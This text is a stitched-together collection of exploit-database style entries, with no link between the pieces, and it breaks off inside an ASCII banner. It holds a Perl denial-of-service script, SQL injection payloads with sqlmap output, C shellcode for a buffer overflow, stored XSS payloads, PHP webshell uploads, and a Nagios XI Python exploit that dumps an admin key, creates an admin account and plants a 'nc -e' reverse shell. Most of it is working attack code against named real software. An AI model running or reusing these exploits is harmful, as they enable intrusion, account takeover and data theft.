------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="categories[]"
8
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="categories[]"
37
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="brandid"
4
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="status"
1
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="descr"
<script>alert(1)</script>
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="title_tag"
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="meta_keywords"
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="meta_description"
------WebKitFormBoundaryUsO8JxBs6LhB8LSl--
#!/usr/bin/perl
use Socket;
# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 03 january 2024
# Vendor Homepage: http://minalic.sourceforge.net/
# Notification vendor: No reported
# Tested Version: minaliC 2.0.0
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw
#1. Description
#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server did not properly handle request with large amounts of data via method GET to web server.
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.
#2. Proof of Concept - PoC
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
print "[+] Exploiting... \n";
my $junk = "\x41" x 245;
my $host = "\x41" x 135;
my $i=0;
while ($i <= 3) {
my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";
my $sock;
socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";
my $addr = sockaddr_in($port, inet_aton($ip));
connect($sock, $addr);
send($sock, $buf, length($buf), 0);
$i++;
}
print "[+] Done - Exploited success!!!!!\n\n";
sub intro {
print "***************************************************\n";
print "* minaliC 2.0.0 - Denied of Service *\n";
print "* *\n";
print "* Coded by Fernando Mengali *\n";
print "* *\n";
print "* e-mail: fernando.mengalli\@gmail.com *\n";
print "* *\n";
print "***************************************************\n";
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}
+ Exploit Title: MobileShop master v1.0 - SQL Injection Vuln.
+ Date: 2024-13-03
+ Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com)
+ Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/
+ Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip
+ Tested on: Windows 10 Pro
+ CWE: CWE-89
+ CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ Type: WebApps
+ Platform: PHP
## References:
+ https://cwe.mitre.org/data/definitions/89.html
+ https://owasp.org/Top10/A03_2021-Injection/
## Description:
The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data.
## Proof of Concept:
+ Go to the Login page: "http://localhost/MobileShop-master/Login.html"
+ Fill email and password.
+ Select any product and intercept the request via Burp Suite, then send it to Repeater.
+ Change the 'id' value to any of the below payloads.
+ Send the request
## Payloads:
+ id=1' AND 9071=9071 AND 'EtdU'='EtdU
+ id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk
+ id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
+ Or you can write your own payloads
## Proof of Concept Using SqlMap:
+ Go to the Login page: "http://localhormst/MobileShop-master/Login.html"
+ Fill email and password.
+ Select any product and intercept the request via Burp Suite, then send it to Repeater.
+ Copy to File the request to a "sql.txt" file.
+ Run the following sqlmap command
+ sqlmap -r sql.txt -p id --dbs
```
POST /MobileShop-master/Details.php HTTP/1.1
Host: localhost
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/MobileShop-master/MobilesList.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn
Connection: close
id=1
```
+ Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database.
```
sqlmap -r sql.txt -p id --dbs
```
```
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[04:17:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.12, Apache 2.4.58
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:17:04] [INFO] fetching database names
[04:17:05] [INFO] resumed: 'information_schema'
[04:17:05] [INFO] resumed: '1'
[04:17:05] [INFO] resumed: '3'
[04:17:05] [INFO] resumed: 'admidio'
[04:17:05] [INFO] resumed: 'calender'
[04:17:05] [INFO] resumed: 'corregidor'
[04:17:05] [INFO] resumed: 'gym'
[04:17:05] [INFO] resumed: 'joomla_db'
[04:17:05] [INFO] resumed: 'linkstack'
[04:17:05] [INFO] resumed: 'mobileshop'
[04:17:05] [INFO] resumed: 'mysql'
[04:17:05] [INFO] resumed: 'nickey'
[04:17:05] [INFO] resumed: 'performance_schema'
[04:17:05] [INFO] resumed: 'phpmyadmin'
[04:17:05] [INFO] resumed: 'rcms'
[04:17:05] [INFO] resumed: 'smith'
[04:17:05] [INFO] resumed: 'telephone'
[04:17:05] [INFO] resumed: 'test'
[04:17:05] [INFO] resumed: 'valente'
```
#include <stdio.h>
#include <string.h>
#define MAX_LEN 256
#define BUFFER_OVERRUN_LENGTH 50
#define SHELLCODE_LENGTH 32
// NOP sled to increase the chance of successful shellcode execution
char nop_sled[SHELLCODE_LENGTH] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
// Shellcode to execute /bin/sh
char shellcode[SHELLCODE_LENGTH] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
void apply_cgi(char *vpn_client_ip) {
char buffer[MAX_LEN];
strncpy(buffer, vpn_client_ip, MAX_LEN);
printf("Client IP: %s\n", buffer);
}
int main() {
char input[MAX_LEN + BUFFER_OVERRUN_LENGTH] = {0};
// Create a buffer with the malicious input
// including the NOP sled, shellcode, and the overflow data
int offset = strlen(nop_sled) + strlen(shellcode) - BUFFER_OVERRUN_LENGTH;
strncpy(&input[0], nop_sled, offset);
strncpy(&input[offset], shellcode, SHELLCODE_LENGTH);
input[MAX_LEN + BUFFER_OVERRUN_LENGTH - 1] = '\x00';
// Call the vulnerable function to trigger the buffer overflow
apply_cgi(input);
return 0;
}
# Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple
Stored XSS
# Date: 2024-02-08
# Exploit Author: Hakkı TOKLU
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: 1.0
# Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0
Support Ticket
Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered.
Example Request :
POST /e-insurance/Script/user/core/new_ticket HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=LG3LFIBJCN9DKVXKYS41
category=4&subject=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&description=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&submit=1
Create Account
Click on New Account button on login page, then fill the fields. Inject <img src=x onerror=prompt("xss")> payloads to fname, lname, city and street parameter, then click Create Account button. XSS will be triggered when admin visits Users page.
Example Request :
POST /e-insurance/Script/core/new_account HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 303
Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15
fname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&lname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&gender=Male&phone=5554443322&city=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&street=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&email=test1%40test.com&password=Test12345&submit=1
# Exploit Title: Wallos - File Upload RCE (Authenticated)
# Date: 2024-03-04
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://github.com/ellite/Wallos
# Software Link: https://github.com/ellite/Wallos
# Version: < 1.11.2
# Tested on: Debian 12
Wallos allows you to upload an image/logo when you create a new subscription.
This can be bypassed to upload a malicious .php file.
POC
---
1) Log into the application.
2) Go to "New Subscription"
3) Upload Logo and choose your webshell .php
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:
--- SNIP -----------------
POST /endpoints/subscription/add.php HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.44/
Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324
Origin: http://192.168.1.44
Content-Length: 7220
Connection: close
Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="name"
test
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo"; filename="revshell.php"
Content-Type: image/jpeg
GIF89a;
<?php
system($_GET['cmd']);
?>
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo-url"
----- SNIP -----
5) You will get the response that your file was uploaded ok:
{"status":"Success","message":"Subscription updated successfully"}
6) Your file will be located in:
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php
# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload
# Google Dork: N/A
# Exploit Author: SoSPiro
# Date: 2024-02-18
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/tourism-management-system-free-download/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Allows admin to upload all files to the web server
# CVE : N/A
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.
# PoC request
POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201
Content-Length: 361
Origin: http://localhost
Connection: close
Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1
Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: red
-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"
Content-Type: text/plain
<?php phpinfo();?>
-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="submit"
-----------------------------390927495111779706051786831201--
===========================================================================================
- Response -
HTTP/1.1 200 OK
Date: Sun, 18 Feb 2024 04:33:37 GMT
Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev
X-Powered-By: PHP/8.1.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8146
============================================================================================
- File location -
http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php
# Exploit Title: Purei CMS 1.0 - SQL Injection
# Date: [27-03-2024]
# Exploit Author: [Number 7]
# Vendor Homepage: [purei.com]
# Version: [1.0]
# Tested on: [Linux]
____________________________________________________________________________________
Introduction:
An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation
of user input. Such an injection transpires when web applications accept user input directly inserted
into an SQL statement without effectively filtering out hazardous characters.
This could jeopardize the integrity of your database or reveal sensitive information.
____________________________________________________________________________________
Time-Based Blind SQL Injection:
Vulnerable files:
http://localhost/includes/getAllParks.php
http://localhost/includes/getSearchMap.php
make a POST request with the value of the am input set to :
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
make sure to url encode the inputs.
SQL injection:
Method: POST REQUEST
Vunerable file:
/includes/events-ajax.php?action=getMonth
data for the POST req:
month=3&type=&year=2024&cal_id=1[Inject Here]
# Exploit Title: Workout Journal App 1.0 - Stored XSS
# Date: 12.01.2024
# Exploit Author: MURAT CAGRI ALIS
# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html>
# Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows / MacOS / Linux
# CVE : CVE-2024-24050
# Description
Install and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php url
For the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.
# PoC
Register Request to /workout-journal/endpoints/add-user.php
POST /workout-journal/endpoint/add-user.php HTTP/1.1
Host: localhost
Content-Length: 268
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/workout-journal/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vci
Connection: close
first_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-
This request turn back 200 Code on Response
HTTP/1.1 200 OK
Date: Sat, 16 Mar 2024 02:05:52 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
X-Powered-By: PHP/8.1.4
Content-Length: 214
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
alert('Account Registered Successfully!');
window.location.href = 'http://localhost/workout-journal/';
</script>
After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right.
/workout-journal/home.php Request
GET /workout-journal/home.php HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: http://localhost/workout-journal/endpoint/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1
Connection: close
/workout-journal/home.php Response
HTTP/1.1 200 OK
Date: Sat, 16 Mar 2024 02:07:56 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
X-Powered-By: PHP/8.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 2791
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Workout Journal App</title>
<!-- Style CSS -->
<link rel="stylesheet" href="./assets/style.css">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">
<style>
body {
overflow: hidden;
}
</style>
</head>
<body>
<div class="main">
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<a class="navbar-brand ml-3" href="#">Workout Journal App</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav ml-auto">
<li class="nav-item active">
<a class="nav-link" href="./endpoint/logout.php">Log Out</a>
</li>
</div>
</nav>
<div class="landing-page-container">
<div class="heading-container">
<h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>
<p>What would you like to do today?</p>
</div>
<div class="select-option">
<div class="read-journal" onclick="redirectToReadJournal()">
<img src="./assets/read.jpg" alt="">
<p>Read your past workout journals.</p>
</div>
<div class="write-journal" onclick="redirectToWriteJournal()">
<img src="./assets/write.jpg" alt="">
<p>Write your todays journal.</p>
</div>
</div>
</div>
</div>
<!-- Bootstrap JS -->
<script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>
<!-- Script JS -->
<script src="./assets/script.js"></script>
</body>
</html>
# Exploit Title: NAGIOS XI SQLI
# Google Dork: [if applicable]
# Date: 02/26/2024
# Exploit Author: Jarod Jaslow (MAWK) https://www.linkedin.com/in/jarod-jaslow-codename-mawk-265144201/
# Vendor Homepage: https://www.nagios.com/changelog/#nagios-xi
# Software Link: https://github.com/MAWK0235/CVE-2024-24401
# Version: Nagios XI Version 2024R1.01
# Tested on: Nagios XI Version 2024R1.01 LINUX
# CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401
#
import requests
import subprocess
import argparse
import re
import urllib3
import os
import random
import string
from colorama import Fore, Style
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def serviceLogin(user,password):
r = requests.post(f'http://{IP}/nagiosxi/api/v1/authenticate?pretty=1',data={'username':user,'password':password,"valid_min":"5"},verify=False)
print(f"{Fore.MAGENTA}[+] Authenticating with captured credtials to API....")
match = re.search(r'auth_token": "(.*)"',r.text)
if match:
token = match.group(1)
print(f'{Fore.MAGENTA}[+] Token: ' + token)
r = requests.get(f'http://{IP}/nagiosxi/login.php?token={token}', verify=False)
cookie = r.headers['Set-Cookie']
cookie = cookie.split(',')[0]
match = re.search(r'nagiosxi=(.*);', cookie)
cookie = match.group(1)
print(f"{Fore.MAGENTA}[+] Auth cookie is: " + cookie)
return cookie
else:
print(f'{Fore.RED}[-] Authentication Failed..{Style.RESET_ALL}')
exit()
def sqlmap(IP,username,password):
print(f'{Fore.MAGENTA}[+] Starting SQLMAP...')
session = requests.session()
s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)
data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": username, "password": password, "loginButton": ''}
s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)
print(f"{Fore.MAGENTA}[+] Authenticated as User..")
print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")
s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}
session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)
print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")
newPass = "mawk"
data = {"page": "/nagiosxi/login.php", "pageopt": "changepass", "nsp": nsp,"current_password": password, "password1": newPass, "password2": newPass, "reporttimesubmitbutton": ''}
session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)
s= session.get(f'http://{IP}/nagiosxi/')
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
cookie = s.cookies.get('nagiosxi')
sqlmap_command = f'sqlmap --flush-session -u "http://{IP}/nagiosxi//config/monitoringwizard.php/1*?update=1&nextstep=2&nsp={nsp}&wizard=mysqlserver" --cookie="nagiosxi={cookie}" --dump -D nagiosxi -T xi_users --drop-set-cookie --technique=ET --dbms=MySQL -p id --risk=3 --level=5 --threads=10 --batch'
#print(sqlmap_command)
sqlmap_command_output = subprocess.Popen(sqlmap_command,shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True )
try:
for line in iter(sqlmap_command_output.stdout.readline, ''):
if "| Nagios Administrator |" in line:
match = re.search(r"Nagios Administrator \| (.*?) \|", line)
if match:
adminKey= match.group(1)
print(f"{Fore.MAGENTA}[+] Admin Key recovered: " + adminKey)
return adminKey
else:
print(f"{Fore.RED}[-] Could not pull Admin Key :(....{Style.RESET_ALL}")
exit()
break
print("[-] SQLMAP capture FAILED..")
sqlmap_command_output.terminate()
except KeyboardInterrupt:
print(f"{Fore.RED}[-] SQLMAP interrupted. Cleaning up...{Style.RESET_ALL}")
sqlmap_command_output.terminate()
sqlmap_command_output.communicate()
exit()
def createAdmin(IP,adminKey):
characters = string.ascii_letters + string.digits
random_username = ''.join(random.choice(characters) for i in range(5))
random_password = ''.join(random.choice(characters) for i in range(5))
data = {"username": random_username, "password": random_password, "name": random_username, "email": f"{random_username}@mail.com", "auth_level": "admin"}
r = requests.post(f'http://{IP}/nagiosxi/api/v1/system/user?apikey={adminKey}&pretty=1', data=data, verify=False)
if "success" in r.text:
print(f'{Fore.MAGENTA}[+] Admin account created...')
return random_username, random_password
else:
print(f'{Fore.RED}[-] Account Creation Failed!!! :(...{Style.RESET_ALL}')
print(r.text)
exit()
def start_HTTP_server():
subprocess.Popen(["python", "-m", "http.server", "8000"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def adminExploit(adminUsername, adminPassword, IP, LHOST,LPORT):
print(f"{Fore.MAGENTA}[+] Conducting mandatory password change...")
session = requests.session()
s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)
data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": adminUsername, "password": adminPassword, "loginButton": ''}
s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)
print(f"{Fore.MAGENTA}[+] Authenticated as admin..")
print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")
s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}
session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)
print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")
newAdminPass = adminUsername + adminPassword
data = {"page": "/nagiosxi/login.php", "pageopt": "changepass","current_password": adminPassword, "nsp": nsp, "password1": newAdminPass, "password2": newAdminPass, "reporttimesubmitbutton": ''}
session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)
print(f"{Fore.MAGENTA}[+] Creating new command...")
data = {"tfName": adminUsername, "tfCommand": f"nc -e /usr/bin/sh {LHOST} {LPORT}", "selCommandType": "1", "chbActive": "1", "cmd": "submit", "mode": "insert", "hidId": "0", "hidName": '', "hidServiceDescription": '', "hostAddress": "127.0.0.1", "exactType": "command", "type": "command", "genericType": "command"}
session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?type=command&page=1', data=data)
data = {"cmd": '', "continue": ''}
start_HTTP_server()
print(f"{Fore.MAGENTA}[+] Created command: " + adminUsername)
session.post(f'http://{IP}/nagiosxi/includes/components/nagioscorecfg/applyconfig.php?cmd=confirm', data=data)
data = {"search": adminUsername}
s = session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?cmd=view&type=command&page=1', data=data)
match = re.search(r"javascript:actionPic\('deactivate','(.*?)','", s.text)
if match:
commandCID = match.group(1)
print(f"{Fore.MAGENTA}[+] Captured Command CID: " + commandCID)
s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/?cmd=view&type=service")
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
if match:
nsp = match.group(1)
s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/command_test.php?cmd=test&mode=test&cid={commandCID}&nsp={nsp}")
os.system("kill -9 $(lsof -t -i:8000)")
print(f"{Fore.RED}[+] CHECK UR LISTENER")
else:
print(f"{Fore.RED}[-] ERROR")
else:
print(f"{Fore.RED}[-] Failed to capture Command CID..{Style.RESET_ALL}")
if __name__ == '__main__':
ascii_art = f"""{Fore.LIGHTRED_EX}
███╗ ███╗ █████╗ ██╗ ██╗██╗ ██╗ ███████╗ ██████╗██████╗ ██╗██████╗ ████████╗███████╗
████╗ ████║██╔══██╗██║ ██║██║ ██╔╝ ██╔════╝██╔════╝██╔══██╗██║██╔══██╗╚══██╔══╝██╔════╝
██╔████╔██║███████║██║ █╗ ██║█████╔╝ ███████╗██║ ██████╔╝██║██████╔╝ ██║ ███████╗
██║╚██╔╝██║██╔══██║██║███╗██║██╔═██╗ ╚════██║██║ ██╔══██╗██║██╔═══╝ ██║ ╚════██║
██║ ╚═╝ ██║██║ ██║╚███╔███╔╝██║ ██╗ ███████║╚██████╗██║ ██║██║██║ ██║ ███████║
